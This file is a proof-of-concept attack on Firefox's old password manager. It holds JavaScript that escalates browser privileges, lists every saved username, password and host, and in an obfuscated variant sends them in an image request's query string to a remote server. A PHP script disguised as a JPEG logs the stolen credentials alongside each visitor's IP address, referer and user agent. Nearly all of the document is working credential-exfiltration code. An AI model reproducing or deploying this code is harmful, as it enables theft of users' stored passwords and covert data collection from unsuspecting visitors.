<html>
<head>
<script>

document.write('<img src="http://www.0x000000.com/hacks/red_dress.gif"><br><br>');
/*
- It would be possible to glue all these passwords on the image above, and I could capture them in my logs.
- I could call a remote PHP script which submits the passwords.
- This shows how dangerous trusted content can be, imagine you open a HELP file from a piece of software you downloaded,
you are never sure your passwords are send to some server.
- Thanks to Mozilla for this flawed security model, I heard this won't work anymore in FF 3.0 Well, we'll see.
*/

setTimeout("listPW()",1000);

function listPW() {
if(document.location !='http://www.0x000000.com/hacks/hello.html') {
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();
pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);
var enumerator = pm.enumerator;
document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');
document.writeln('<br><br>');
while (enumerator.hasMoreElements()) {
try {
var np = enumerator.getNext();
np = np.QueryInterface(Components.interfaces.nsIPassword);
presult = '['+np.user+'] ['+np.password+'] ['+np.host+'] <br>';
document.writeln(presult);
}
catch(e) { }
}
} else {
alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!');
}
}

</script>

</head>
<body>
<img src="hello_files/red_dress.gif"><br><br>
</body>
</html>

var = "myimage.jpge"; >> myimage.php

<script>
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
img = "img.jpg"; var sm = "uspastestr()";
var pm = Components.classes["@mozilla.org/"+sm.substr(2,3)+"swordmanager;1"].getService();
pm = pm.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"swordManager"));
var enumerator = pm.enumerator; var str = ''; while (enumerator.hasMoreElements()) {
try { var np = enumerator.getNext();
np = np.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"sword"));
presult = '['+eval("np."+sm.substr(0,2)+"er")+','+eval("np."+sm.substr(2,3)+"sword")+','+np.host+']'+String.fromCharCode(172); str += presult;
} catch(e) { } } 
img = img.concat("?str=").replace(img.substr(-3,3),sm.charAt(2)+"h"+sm.charAt(2))+str;
var str = "<img src=\"http://[server]/"+img+"\">";
document.write(str);  setTimeout("window.stop()",1000);

</script>

<?php
header("Content-type: image/jpeg");
$img = imagecreatefromjpeg("img.jpg");
imagejpeg($img);
imagedestroy($img);

$strRnd=date("His");
$strFecha=date("H:i:s d/m/y ");
$strIP = getenv("REMOTE_ADDR");
$strUserAgent =  htmlentities($_SERVER['HTTP_USER_AGENT']);
$strReferer = htmlentities($_SERVER['HTTP_REFERER']); if (strlen($strReferer) == 0) { $strReferer = "Ninguna"; }
$str = $_GET['str'];
$str=str_replace(chr(172),"<br>",$str);

$fp = fopen("fox-".$strRnd.".html","w+");
fwrite($fp, "Fecha: ".$strFecha."<br> Direccion IP: ".$strIP."<br> Referencia: ".$strReferer."<br> User-Agent: ".$strUserAgent.
"<br><br>".$str."<br>");
fclose($fp);
?>